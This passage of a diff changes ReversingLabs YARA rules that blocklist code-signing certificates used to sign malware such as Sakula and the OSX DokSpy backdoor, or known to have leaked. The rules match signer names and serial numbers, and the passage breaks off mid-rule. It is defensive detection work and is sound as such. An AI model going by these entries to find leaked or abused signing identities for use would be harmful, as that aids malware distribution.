(0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures[i].serial=="12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" and 1606953600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures[i].serial=="47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Sakula malware." author = "ReversingLabs" - id = "93ca450e-7278-5c6c-aba8-e90728570e0c" + id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8072-L8090" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "39d9695803e96508b5ad12a7d9f8b65d13288dbe94b21a4952e096dd576e11ce" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2104-L2120" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107" score = 75 quality = 90 tags = "INFO, FILE" @@ -11612,22 +31403,22 @@ rule REVERSINGLABS_Cert_Blocklist_D338F8A490E37E6C2Be80A0E349929Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAGUARO ApS" and (pe.signatures[i].serial=="00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" or pe.signatures[i].serial=="d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa") and 1607558400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "U-Tech IT service" and pe.signatures[i].serial=="3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Sakula malware." author = "ReversingLabs" - id = "70fc063e-f032-5e63-ae53-65a25d5a29c3" + id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8092-L8108" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7752e49e8848863d78c5de03c3d194498765d80da00a84c5164c7a9010d13474" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2122-L2138" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a" score = 75 quality = 90 tags = "INFO, FILE" @@ -11637,22 +31428,22 @@ rule REVERSINGLABS_Cert_Blocklist_2C1Ee9B583310B5E34A1Ee6945A34B26 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Artmarket" and pe.signatures[i].serial=="2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" and 1607558400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MICRO DIGITAL INC." and pe.signatures[i].serial=="31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing Sakula malware." author = "ReversingLabs" - id = "4aedeb77-181b-5422-bec4-93c84412bae4" + id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8110-L8128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9e181271d46c828b9ec266331e077b3b4891a193c71173447da383fad91ae878" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2140-L2156" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6" score = 75 quality = 90 tags = "INFO, FILE" @@ -11662,22 +31453,22 @@ rule REVERSINGLABS_Cert_Blocklist_D875B3E3F2Db6C3Eb426E24946066111 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Kubit LLC" and (pe.signatures[i].serial=="00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" or pe.signatures[i].serial=="d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11") and 1606953600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SJ SYSTEM" and pe.signatures[i].serial=="20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing OSX DokSpy backdoor." author = "ReversingLabs" - id = "183d9d02-885b-5f2f-b455-dd72af7bc5a6" + id = "3581085c-a6e7-571f-8253-f8d9e90e78fc" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8130-L8148" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "07e53e59f90aa3cd3a98dbca2627672606f6c6f8f3bda8456e32122463729c4b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2158-L2174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9" score = 75 quality = 90 tags = "INFO, FILE" @@ -11687,22 +31478,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ad0A958Cdf188Bed43154A54Bf23Afba : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RHM Ltd" and (pe.signatures[i].serial=="00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures[i].serial=="ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba") and 1612915200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures[i].serial=="12:72:51:b3:2b:9a:50:bd" and 1493769599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Certificate used for digitally signing OSX DokSpy backdoor." author = "ReversingLabs" - id = "79989b9b-60e4-577d-97e2-cb447c38baf3" + id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8150-L8166" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5c64f8e40c31822ce8d2e34f96ccc977085e429f0c068a5f6b44099117837de1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2176-L2192" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804" score = 75 quality = 90 tags = "INFO, FILE" @@ -11712,22 +31503,22 @@ rule REVERSINGLABS_Cert_Blocklist_3Cee26C125B8C188F316C3Fa78D9C2F1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bitubit LLC" and pe.signatures[i].serial=="3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" and 1606435200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures[i].serial=="48:ca:d4:e6:96:6e:22:d6" and 1492732799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "c45a2125-dd7c-5ff1-89a8-35cbe1d924d7" + id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8168-L8184" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "287c0c7a25e33e0e7def6efa23dbd2efba7c4ac3aa8f5deb8568a60a95e08bbe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2194-L2210" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0" score = 75 quality = 90 tags = "INFO, FILE" @@ -11737,22 +31528,22 @@ rule REVERSINGLABS_Cert_Blocklist_4C687A0022C36F89E253F91D1F6954E2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HETCO ApS" and pe.signatures[i].serial=="4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" and 1606780800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ziber Ltd" and pe.signatures[i].serial=="5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "b176b7f8-e3d1-593c-91c3-03e781f6ef7b" + id = "06f79efe-134e-5941-80fe-3b6482ac9668" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8186-L8204" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a690e3f6a656835984e47d999271fe441a5fbf424208da8d5b3c9ddcef47b70e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2212-L2228" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748" score = 75 quality = 90 tags = "INFO, FILE" @@ -11762,22 +31553,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ca646B4275406Df639Cf603756F63D77 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SHOECORP LIMITED" and (pe.signatures[i].serial=="00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures[i].serial=="ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77") and 1605830400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADD Audit" and pe.signatures[i].serial=="4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "f2488d44-5a9a-5ab6-be6f-f3444f72444a" + id = "b7439b38-c8b7-5dcb-8d10-952862ce3465" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8206-L8224" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "799629791646c524d170b900339b87474aed73b7156a8c4dd20f7c13cbe97929" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2230-L2246" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee" score = 75 quality = 90 tags = "INFO, FILE" @@ -11787,22 +31578,22 @@ rule REVERSINGLABS_Cert_Blocklist_Addbec454B5479Cabd940A72Df4500Af : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SHAT LIMITED" and (pe.signatures[i].serial=="00:ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af" or pe.signatures[i].serial=="ad:db:ec:45:4b:54:79:ca:bd:94:0a:72:df:45:00:af") and 1612828800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Media Lid" and pe.signatures[i].serial=="2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "c33d798a-854c-5fab-afbe-e94d142befa7" + id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8226-L8244" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "10819bd2194fface6db812f8c6770c306c183386d2d9ba97467a5b55fd997194" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2248-L2264" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b" score = 75 quality = 90 tags = "INFO, FILE" @@ -11812,22 +31603,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ac307E5257Bb814B818D3633B630326F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aqua Direct s.r.o." and (pe.signatures[i].serial=="00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" or pe.signatures[i].serial=="ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f") and 1606089600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Megabit, OOO" and pe.signatures[i].serial=="0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "d6bda332-06fc-5b1a-99fb-fc9578dc5326" + id = "489ffe25-43cf-55b6-b249-17d251b9774e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8246-L8262" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b344f9fd6d8378b7d77a34b14c5f37eea253f3d13a8eb0777925f195fb3cf502" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2266-L2282" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711" score = 75 quality = 90 tags = "INFO, FILE" @@ -11837,22 +31628,22 @@ rule REVERSINGLABS_Cert_Blocklist_0D83E7F47189Cdbfc7Fa3E5F58882329 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures[i].serial=="0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" and 1605830400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Raffaele Carnacina" and pe.signatures[i].serial=="08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "00e096f6-2955-5936-9a75-f537c2da3621" + id = "a14e16ff-844c-53ff-9297-8760265da747" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8264-L8280" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6b50ebf707b67650fe832d81c6fe8d2411cd83432ef94432d181db0c29aa48b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2284-L2300" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417" score = 75 quality = 90 tags = "INFO, FILE" @@ -11862,22 +31653,22 @@ rule REVERSINGLABS_Cert_Blocklist_58Aa64564A50E8B2D6E31D5Cd6250Fde : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foreground" and pe.signatures[i].serial=="58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" and 1609002028<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VALERIANO BEDESCHI" and pe.signatures[i].serial=="02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d2d61fd7-2392-5d75-9c5b-4e4fddfc7a83" + id = "4372aea7-a25b-5211-befd-9e0bcfb09199" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8282-L8298" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a362175600552983ae838ca18aa378dc748b8b68bd8b67a9387794d983ed1a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2302-L2318" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933" score = 75 quality = 90 tags = "INFO, FILE" @@ -11887,22 +31678,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Aa0Ae245B487C8926C88Ee6D736D1Ca : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PILOTE SPRL" and pe.signatures[i].serial=="2a:a0:ae:24:5b:48:7c:89:26:c8:8e:e6:d7:36:d1:ca" and 1612262280<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "joaweb" and pe.signatures[i].serial=="7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "02f2bf36-e573-502c-8ecc-843a6e627c2b" + id = "98acd01b-c452-530d-8814-2591810ecd53" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8300-L8316" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b299833a19944ca6943ba9c974ec95369c57cd61acc8b2e1b5310edd077762c2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2320-L2336" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a" score = 75 quality = 90 tags = "INFO, FILE" @@ -11912,22 +31703,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Aec3D3F752A38617C1D7A677D0B5591 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SILVER d.o.o." and pe.signatures[i].serial=="1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" and 1611705600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures[i].serial=="77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A7E1Dc5352C3852C5523030F57F2425C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a2795796-2897-55ad-936c-456c3b93bf14" + id = "4484b00d-8fad-5f8f-9030-67216f2820a3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L8318-L8336" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "79c42c9a4eeeb69a62a16590e2b0b63818785509a40d543c7efe27ec6baaa19e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L2338-L2354" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 